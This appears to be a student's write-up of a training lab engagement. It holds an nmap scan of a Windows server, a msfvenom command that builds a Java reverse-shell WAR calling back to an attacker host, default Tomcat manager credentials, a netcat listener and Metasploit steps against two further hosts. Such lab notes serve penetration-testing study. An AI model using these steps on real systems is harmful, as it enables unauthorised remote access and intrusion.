The Live Engagement

April 30, 2024

First we have to login into the ip that was given

RDP to 10.129.86.5 with user "htb-student" and password "HTB_@cademy_stdnt!"

First we have to nmap scan the first host which is the 172.16.1.11

# Nmap 7.92 scan initiated Tue Apr 30 02:56:03 2024 as: nmap -sC -sV -oN firsthost.nmap 172.16.1.11
Nmap scan report for status.inlanefreight.local (172.16.1.11)
Host is up (0.026s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Inlanefreight Server Status
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server 2019 Standard 17763 microsoft-ds
515/tcp  open  printer       Microsoft lpd
1801/tcp open  msmq?
2103/tcp open  msrpc         Microsoft Windows RPC
2105/tcp open  msrpc         Microsoft Windows RPC
2107/tcp open  msrpc         Microsoft Windows RPC
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=shells-winsvr
| Not valid before: 2024-04-29T06:08:54
|_Not valid after:  2024-10-29T06:08:54
|_ssl-date: 2024-04-30T06:57:03+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: SHELLS-WINSVR
|   NetBIOS_Domain_Name: SHELLS-WINSVR
|   NetBIOS_Computer_Name: SHELLS-WINSVR
|   DNS_Domain_Name: shells-winsvr
|   DNS_Computer_Name: shells-winsvr
|   Product_Version: 10.0.17763
|_  System_Time: 2024-04-30T06:56:57+00:00
8080/tcp open  http          Apache Tomcat 10.0.11
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/10.0.11
|_http-favicon: Apache Tomcat
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: shells-winsvr
|   NetBIOS computer name: SHELLS-WINSVR\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-04-29T23:56:57-07:00
| smb2-time: 
|   date: 2024-04-30T06:56:57
|_  start_date: N/A
|_clock-skew: mean: 1h23m59s, deviation: 3h07m49s, median: -1s
|_nbstat: NetBIOS name: SHELLS-WINSVR, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:17:44 (VMware)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr 30 02:57:03 2024 -- 1 IP address (1 host up) scanned in 59.90 seconds

Then we will seach for exploit for the web server tomcat

But it failed

It tried both the IP but still failed

Then we are going to change the payload for the exploit

msfvenom -l payloads | grep java

msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LPORT=9001 -f war -o shell.war

Click the Manager App

User - tomcat
Pass - Tomcatadm

Upload a war file

After several to upload the war reverse shell it became successful

Set up a listener and go access the shell

nc -lnvp 9001

• Second host - 172.16.1.12 or blog.inlanefrieght.local

Use reload_all to refresh the modules in msfconsole

reload_all

run 
shell
cat /customscripts/flag.txt

• Third host - 172.16.1.13

use 1
options
set rhost 172.16.1.13
set lhost 172.16.1.5

run